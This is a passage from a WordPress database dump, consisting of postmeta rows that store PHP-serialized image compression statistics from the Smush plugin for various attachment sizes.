48;s:11:\"size_before\";i:34027;s:10:\"size_after\";i:24079;s:4:\"time\";d:0.04;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.15;s:5:\"bytes\";i:2498;s:11:\"size_before\";i:8569;s:10:\"size_after\";i:6071;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.72;s:5:\"bytes\";i:1416;s:11:\"size_before\";i:4464;s:10:\"size_after\";i:3048;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.74;s:5:\"bytes\";i:6034;s:11:\"size_before\";i:20994;s:10:\"size_after\";i:14960;s:4:\"time\";d:0.02;}}}'),(701,32,'wp-smush-lossy','1'),(702,32,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.215679318907412;s:5:\"bytes\";i:5135;s:11:\"size_before\";i:28190;s:10:\"size_after\";i:23055;s:4:\"time\";d:0.05;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.68;s:5:\"bytes\";i:376;s:11:\"size_before\";i:3218;s:10:\"size_after\";i:2842;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.81;s:5:\"bytes\";i:1135;s:11:\"size_before\";i:6750;s:10:\"size_after\";i:5615;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.89;s:5:\"bytes\";i:3624;s:11:\"size_before\";i:18222;s:10:\"size_after\";i:14598;s:4:\"time\";d:0.02;}}}'),(703,34,'wp-smush-lossy','1'),(704,34,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.75331168600911;s:5:\"bytes\";i:27150;s:11:\"size_before\";i:197407;s:10:\"size_after\";i:170257;s:4:\"time\";d:0.26;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.52;s:5:\"bytes\";i:1523;s:11:\"size_before\";i:11263;s:10:\"size_after\";i:9740;s:4:\"time\";d:0.02;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.06;s:5:\"bytes\";i:107;s:11:\"size_before\";i:2634;s:10:\"size_after\";i:2527;s:4:\"time\";d:0.04;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.54;s:5:\"bytes\";i:613;s:11:\"size_before\";i:5815;s:10:\"size_after\";i:5202;s:4:\"time\";d:0.05;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.12;s:5:\"bytes\";i:3067;s:11:\"size_before\";i:21726;s:10:\"size_after\";i:18659;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.27;s:5:\"bytes\";i:8337;s:11:\"size_before\";i:58429;s:10:\"size_after\";i:50092;s:4:\"time\";d:0.05;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.84;s:5:\"bytes\";i:13503;s:11:\"size_before\";i:97540;s:10:\"size_after\";i:84037;s:4:\"time\";d:0.08;}}}'),(705,35,'wp-smush-lossy','1'),(706,35,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.410753703055306;s:5:\"bytes\";i:16305;s:11:\"size_before\";i:131378;s:10:\"size_after\";i:115073;s:4:\"time\";d:0.2;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.5;s:5:\"bytes\";i:813;s:11:\"size_before\";i:7743;s:10:\"size_after\";i:6930;s:4:\"time\";d:0.02;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.42;s:5:\"bytes\";i:75;s:11:\"size_before\";i:3096;s:10:\"size_after\";i:3021;s:4:\"time\";d:0.02;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:1646;s:10:\"size_after\";i:1646;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.06;s:5:\"bytes\";i:1622;s:11:\"size_before\";i:13450;s:10:\"size_after\";i:11828;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.25;s:5:\"bytes\";i:5198;s:11:\"size_before\";i:39222;s:10:\"size_after\";i:34024;s:4:\"time\";d:0.04;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.98;s:5:\"bytes\";i:8597;s:11:\"size_before\";i:66221;s:10:\"size_after\";i:57624;s:4:\"time\";d:0.09;}}}'),(707,36,'wp-smush-lossy','1'),(708,36,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.43137481242064;s:5:\"bytes\";i:37752;s:11:\"size_before\";i:216575;s:10:\"size_after\";i:178823;s:4:\"time\";d:0.28;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.49;s:5:\"bytes\";i:2190;s:11:\"size_before\";i:11842;s:10:\"size_after\";i:9652;s:4:\"time\";d:0.02;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.54;s:5:\"bytes\";i:269;s:11:\"size_before\";i:2821;s:10:\"size_after\";i:2552;s:4:\"time\";d:0.04;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.47;s:5:\"bytes\";i:876;s:11:\"size_before\";i:6054;s:10:\"size_after\";i:5178;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";i:18;s:5:\"bytes\";i:4101;s:11:\"size_before\";i:22789;s:10:\"size_after\";i:18688;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.29;s:5:\"bytes\";i:11734;s:11:\"size_before\";i:64164;s:10:\"size_after\";i:52430;s:4:\"time\";d:0.07;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.06;s:5:\"bytes\";i:18582;s:11:\"size_before\";i:108905;s:10:\"size_after\";i:90323;s:4:\"time\";d:0.12;}}}'),(709,39,'wp-smush-lossy','1'),(710,39,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.415165456460285;s:5:\"bytes\";i:3758;s:11:\"size_before\";i:36082;s:10:\"size_after\";i:32324;s:4:\"time\";d:0.26;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.28;s:5:\"bytes\";i:621;s:11:\"size_before\";i:1924;s:10:\"size_after\";i:1303;s:4:\"time\";d:0.02;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:58.56;s:5:\"bytes\";i:701;s:11:\"size_before\";i:1197;s:10:\"size_after\";i:496;s:4:\"time\";d:0.05;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.23;s:5:\"bytes\";i:638;s:11:\"size_before\";i:3930;s:10:\"size_after\";i:3292;s:4:\"time\";d:0.03;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:45.99;s:5:\"bytes\";i:665;s:11:\"size_before\";i:1446;s:10:\"size_after\";i:781;s:4:\"time\";d:0.04;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.78;s:5:\"bytes\";i:595;s:11:\"size_before\";i:10299;s:10:\"size_after\";i:9704;s:4:\"time\";d:0.03;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.11;s:5:\"bytes\";i:538;s:11:\"size_before\";i:17286;s:10:\"size_after\";i:16748;s:4:\"time\";d:0.09;}}}'),(711,60,'wp-smush-lossy','1'),(712,60,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:75.09032135386956;s:5:\"bytes\";i:3949;s:11:\"size_before\";i:5259;s:10:\"size_after\";i:1310;s:4:\"time\";d:0.03;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:75.09;s:5:\"bytes\";i:3949;s:11:\"size_before\";i:5259;s:10:\"size_after\";i:1310;s:4:\"time\";d:0.03;}}}'),(713,224,'wp-smush-lossy','1'),(714,224,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:23.581721845364655;s:5:\"bytes\";i:13975;s:11:\"size_before\";i:59262;s:10:\"size_after\";i:45287;s:4:\"time\";d:0.05;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.63;s:5:\"bytes\";i:2238;s:11:\"size_before\";i:8733;s:10:\"size_after\";i:6495;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.25;s:5:\"bytes\";i:1395;s:11:\"size_before\";i:4612;s:10:\"size_after\";i:3217;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.65;s:5:\"bytes\";i:4592;s:11:\"size_before\";i:20277;s:10:\"size_after\";i:15685;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.43;s:5:\"bytes\";i:5750;s:11:\"size_before\";i:25640;s:10:\"size_after\";i:19890;s:4:\"time\";d:0.02;}}}'),(715,258,'wp-smush-lossy','1'),(716,258,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.83783783783784;s:5:\"bytes\";i:734;s:11:\"size_before\";i:3700;s:10:\"size_after\";i:2966;s:4:\"time\";d:0.02;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.84;s:5:\"bytes\";i:734;s:11:\"size_before\";i:3700;s:10:\"size_after\";i:2966;s:4:\"time\";d:0.02;}}}'),(717,259,'wp-smush-lossy','1'),(718,259,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:68.8687555052221;s:5:\"bytes\";i:5473;s:11:\"size_before\";i:7947;s:10:\"size_after\";i:2474;s:4:\"time\";d:0.01;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:68.87;s:5:\"bytes\";i:5473;s:11:\"size_before\";i:7947;s:10:\"size_after\";i:2474;s:4:\"time\";d:0.01;}}}'),(719,358,'wp-smush-lossy','1'),(720,358,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.214987714987715;s:5:\"bytes\";i:84;s:11:\"size_before\";i:39072;s:10:\"size_after\";i:38988;s:4:\"time\";d:0.09;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:3316;s:10:\"size_after\";i:3316;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.53;s:5:\"bytes\";i:65;s:11:\"size_before\";i:12191;s:10:\"size_after\";i:12126;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:6430;s:10:\"size_after\";i:6430;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.11;s:5:\"bytes\";i:19;s:11:\"size_before\";i:17135;s:10:\"size_after\";i:17116;s:4:\"time\";d:0.06;}}}'),(721,359,'wp-smush-lossy','1'),(722,359,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:9529;s:10:\"size_after\";i:9529;s:4:\"time\";d:0.07;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:6284;s:10:\"size_after\";i:6284;s:4:\"time\";d:0.02;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:3245;s:10:\"size_after\";i:3245;s:4:\"time\";d:0.05;}}}'),(723,362,'wp-smush-lossy','1'),(724,362,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:8338;s:10:\"size_after\";i:8338;s:4:\"time\";d:0.04;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:5276;s:10:\"size_after\";i:5276;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:3062;s:10:\"size_after\";i:3062;s:4:\"time\";d:0.03;}}}'),(725,363,'wp-smush-lossy','1'),(726,363,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.23302559723926927;s:5:\"bytes\";i:131;s:11:\"size_before\";i:56217;s:10:\"size_after\";i:56086;s:4:\"time\";d:0.2;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:8:{s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.65;s:5:\"bytes\";i:77;s:11:\"size_before\";i:11775;s:10:\"size_after\";i:11698;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:2909;s:10:\"size_after\";i:2909;s:4:\"time\";d:0.01;}s:13:\"site_icon-192\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:6696;s:10:\"size_after\";i:6696;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.04;s:5:\"bytes\";i:5;s:11:\"size_before\";i:12219;s:10:\"size_after\";i:12214;s:4:\"time\";d:0.03;}s:13:\"site_icon-180\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:6349;s:10:\"size_after\";i:6349;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:4935;s:10:\"size_after\";i:4935;s:4:\"time\";d:0.06;}s:13:\"site_icon-270\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.46;s:5:\"bytes\";i:49;s:11:\"size_before\";i:10562;s:10:\"size_after\";i:10513;s:4:\"time\";d:0.04;}s:12:\"site_icon-32\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:772;s:10:\"size_after\";i:772;s:4:\"time\";d:0.02;}}}'),(727,386,'wp-smush-lossy','1'),(728,386,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.057721078258031;s:5:\"bytes\";i:2227;s:11:\"size_before\";i:36763;s:10:\"size_after\";i:34536;s:4:\"time\";d:0.13;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.34;s:5:\"bytes\";i:420;s:11:\"size_before\";i:3148;s:10:\"size_after\";i:2728;s:4:\"time\";d:0.02;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.87;s:5:\"bytes\";i:587;s:11:\"size_before\";i:10003;s:10:\"size_after\";i:9416;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.18;s:5:\"bytes\";i:493;s:11:\"size_before\";i:6030;s:10:\"size_after\";i:5537;s:4:\"time\";d:0.04;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.13;s:5:\"bytes\";i:727;s:11:\"size_before\";i:17582;s:10:\"size_after\";i:16855;s:4:\"time\";d:0.06;}}}'),(729,407,'wp-smush-lossy','1'),(730,407,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.920784216543793;s:5:\"bytes\";i:8737;s:11:\"size_before\";i:177553;s:10:\"size_after\";i:168816;s:4:\"time\";d:0.18;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.61;s:5:\"bytes\";i:441;s:11:\"size_before\";i:3497;s:10:\"size_after\";i:3056;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.18;s:5:\"bytes\";i:497;s:11:\"size_before\";i:6925;s:10:\"size_after\";i:6428;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.4;s:5:\"bytes\";i:1060;s:11:\"size_before\";i:19637;s:10:\"size_after\";i:18577;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.83;s:5:\"bytes\";i:1470;s:11:\"size_before\";i:30429;s:10:\"size_after\";i:28959;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.5;s:5:\"bytes\";i:5269;s:11:\"size_before\";i:117065;s:10:\"size_after\";i:111796;s:4:\"time\";d:0.12;}}}'),(731,408,'wp-smush-lossy','1'),(732,408,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.61825332626705;s:5:\"bytes\";i:10071;s:11:\"size_before\";i:179255;s:10:\"size_after\";i:169184;s:4:\"time\";d:0.29000000000000004;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.14;s:5:\"bytes\";i:740;s:11:\"size_before\";i:8097;s:10:\"size_after\";i:7357;s:4:\"time\";d:0.02;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.07;s:5:\"bytes\";i:501;s:11:\"size_before\";i:3834;s:10:\"size_after\";i:3333;s:4:\"time\";d:0.02;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.13;s:5:\"bytes\";i:1270;s:11:\"size_before\";i:20706;s:10:\"size_after\";i:19436;s:4:\"time\";d:0.03;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.86;s:5:\"bytes\";i:1833;s:11:\"size_before\";i:31257;s:10:\"size_after\";i:29424;s:4:\"time\";d:0.04;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.96;s:5:\"bytes\";i:5727;s:11:\"size_before\";i:115361;s:10:\"size_after\";i:109634;s:4:\"time\";d:0.18;}}}'),(733,409,'wp-smush-lossy','1'),(734,409,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.9848737445614604;s:5:\"bytes\";i:3920;s:11:\"size_before\";i:98372;s:10:\"size_after\";i:94452;s:4:\"time\";d:0.15000000000000002;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.63;s:5:\"bytes\";i:423;s:11:\"size_before\";i:3349;s:10:\"size_after\";i:2926;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.31;s:5:\"bytes\";i:638;s:11:\"size_before\";i:12008;s:10:\"size_after\";i:11370;s:4:\"time\";d:0.02;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.66;s:5:\"bytes\";i:486;s:11:\"size_before\";i:6342;s:10:\"size_after\";i:5856;s:4:\"time\";d:0.03;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.18;s:5:\"bytes\";i:896;s:11:\"size_before\";i:21453;s:10:\"size_after\";i:20557;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.67;s:5:\"bytes\";i:1477;s:11:\"size_before\";i:55220;s:10:\"size_after\";i:53743;s:4:\"time\";d:0.07;}}}'),(735,410,'wp-smush-lossy','1'),(736,410,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.470217415911327;s:5:\"bytes\";i:5134;s:11:\"size_before\";i:114849;s:10:\"size_after\";i:109715;s:4:\"time\";d:0.16999999999999998;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.88;s:5:\"bytes\";i:448;s:11:\"size_before\";i:5043;s:10:\"size_after\";i:4595;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.2;s:5:\"bytes\";i:437;s:11:\"size_before\";i:3077;s:10:\"size_after\";i:2640;s:4:\"time\";d:0.04;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.39;s:5:\"bytes\";i:744;s:11:\"size_before\";i:13812;s:10:\"size_after\";i:13068;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.8;s:5:\"bytes\";i:996;s:11:\"size_before\";i:20765;s:10:\"size_after\";i:19769;s:4:\"time\";d:0.03;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.48;s:5:\"bytes\";i:2509;s:11:\"size_before\";i:72152;s:10:\"size_after\";i:69643;s:4:\"time\";d:0.08;}}}'),(737,411,'wp-smush-lossy','1'),(738,411,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.506963854280165;s:5:\"bytes\";i:7611;s:11:\"size_before\";i:168872;s:10:\"size_after\";i:161261;s:4:\"time\";d:0.29000000000000004;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.25;s:5:\"bytes\";i:8;s:11:\"size_before\";i:3248;s:10:\"size_after\";i:3240;s:4:\"time\";d:0.03;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.9;s:5:\"bytes\";i:203;s:11:\"size_before\";i:7001;s:10:\"size_after\";i:6798;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.62;s:5:\"bytes\";i:908;s:11:\"size_before\";i:19654;s:10:\"size_after\";i:18746;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.99;s:5:\"bytes\";i:1548;s:11:\"size_before\";i:31037;s:10:\"size_after\";i:29489;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.58;s:5:\"bytes\";i:4944;s:11:\"size_before\";i:107932;s:10:\"size_after\";i:102988;s:4:\"time\";d:0.22;}}}'),(739,412,'wp-smush-lossy','1'),(740,412,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.9439289269699196;s:5:\"bytes\";i:31337;s:11:\"size_before\";i:794563;s:10:\"size_after\";i:763226;s:4:\"time\";d:0.73;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.91;s:5:\"bytes\";i:479;s:11:\"size_before\";i:6935;s:10:\"size_after\";i:6456;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.19;s:5:\"bytes\";i:356;s:11:\"size_before\";i:3494;s:10:\"size_after\";i:3138;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.27;s:5:\"bytes\";i:1020;s:11:\"size_before\";i:19341;s:10:\"size_after\";i:18321;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.62;s:5:\"bytes\";i:1338;s:11:\"size_before\";i:28948;s:10:\"size_after\";i:27610;s:4:\"time\";d:0.03;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.12;s:5:\"bytes\";i:4750;s:11:\"size_before\";i:115162;s:10:\"size_after\";i:110412;s:4:\"time\";d:0.08;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.07;s:5:\"bytes\";i:8077;s:11:\"size_before\";i:198258;s:10:\"size_after\";i:190181;s:4:\"time\";d:0.3;}s:9:\"1536x1536\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.63;s:5:\"bytes\";i:15317;s:11:\"size_before\";i:422425;s:10:\"size_after\";i:407108;s:4:\"time\";d:0.28;}}}'),(741,413,'wp-smush-lossy','1'),(742,413,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.5155681358673675;s:5:\"bytes\";i:204;s:11:\"size_before\";i:39568;s:10:\"size_after\";i:39364;s:4:\"time\";d:0.15;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:2543;s:10:\"size_after\";i:2543;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:5308;s:10:\"size_after\";i:5308;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.04;s:5:\"bytes\";i:4;s:11:\"size_before\";i:11230;s:10:\"size_after\";i:11226;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.98;s:5:\"bytes\";i:200;s:11:\"size_before\";i:20487;s:10:\"size_after\";i:20287;s:4:\"time\";d:0.11;}}}'),(743,414,'wp-smush-lossy','1'),(744,414,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.8023071570493204;s:5:\"bytes\";i:957;s:11:\"size_before\";i:119281;s:10:\"size_after\";i:118324;s:4:\"time\";d:0.13;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:2820;s:10:\"size_after\";i:2820;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:6074;s:10:\"size_after\";i:6074;s:4:\"time\";d:0.02;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.6;s